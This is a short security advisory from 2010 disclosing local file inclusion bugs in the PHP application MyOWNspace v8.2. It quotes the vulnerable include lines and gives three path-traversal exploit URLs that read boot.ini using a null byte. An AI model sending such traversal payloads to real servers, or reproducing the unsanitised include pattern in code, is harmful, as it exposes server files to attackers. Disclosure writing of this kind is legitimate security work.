MyOWNspace_v8.2 multi local file include

2010.03.28
Credit: ItSecTeam
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

=========================================================================== ( #Topic : MyOWNspace_v8.2 ( #Bug type : multi local file include ( #Download : http://sourceforge.net/project/platformdownload.php?group_id=174729 ( #Advisory : =========================================================================== ( #Author : ItSecTeam ( #Email : Bug@ITSecTeam.com ( #Website: http://www.itsecteam.com ( #Forum : http://forum.ITSecTeam.com ( #discovered by : ahmadbady vuls:=================================================================== path/graph.php if (isset($_GET['go'])) {$go=$_GET['go']; line 28 $i=$go; line 30 . . . $friends="myownfriends/friends.".$i.".php"; line 38 include $friends; line 39 . . . . . $friends="myownfriends/friends.".$i.".php"; line 74 include $friends; line 75 --------------------------------------------------------------------------- path/myowngraph.php eror graph.php line 39; if (isset($_GET['go'])) {$go=$_GET['go']; line 28 $i=$go; line 29 include $friends; line 39 --------------------------------------------------------------------------- path/showmyownfriends.php $conf_file="myownfriends/friends.".$_GET['go'].".php"; line 3 include $conf_file; line 17 --------------------------------------------------------------------------- exploit:=================================================================== path/graph.php?go=../../../../../../../boot.ini%00 path/myowngraph.php?go=../../../../../../../boot.ini%00 path/showmyownfriends.php?go=../../../../../../../boot.ini%00 --------------------------------------------------------------------------- itsecteam_MyOWNspace.txt =========================================================================== ( #Topic : MyOWNspace_v8.2 ( #Bug type : multi local file include ( #Download : http://sourceforge.net/project/platformdownload.php?group_id=174729 ( #Advisory : =========================================================================== ( #Author : ItSecTeam ( #Email : Bug@ITSecTeam.com ( #Website: http://www.itsecteam.com ( #Forum : http://forum.ITSecTeam.com ( #discovered by : ahmadbady vuls:=================================================================== path/graph.php if (isset($_GET['go'])) {$go=$_GET['go']; line 28 $i=$go; line 30 . . . $friends="myownfriends/friends.".$i.".php"; line 38 include $friends; line 39 . . . . . $friends="myownfriends/friends.".$i.".php"; line 74 include $friends; line 75 --------------------------------------------------------------------------- path/myowngraph.php eror graph.php line 39; if (isset($_GET['go'])) {$go=$_GET['go']; line 28 $i=$go; line 29 include $friends; line 39 --------------------------------------------------------------------------- path/showmyownfriends.php $conf_file="myownfriends/friends.".$_GET['go'].".php"; line 3 include $conf_file; line 17 --------------------------------------------------------------------------- exploit:=================================================================== path/graph.php?go=../../../../../../../boot.ini%00 path/myowngraph.php?go=../../../../../../../boot.ini%00 path/showmyownfriends.php?go=../../../../../../../boot.ini%00 ---------------------------------------------------------------------------


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top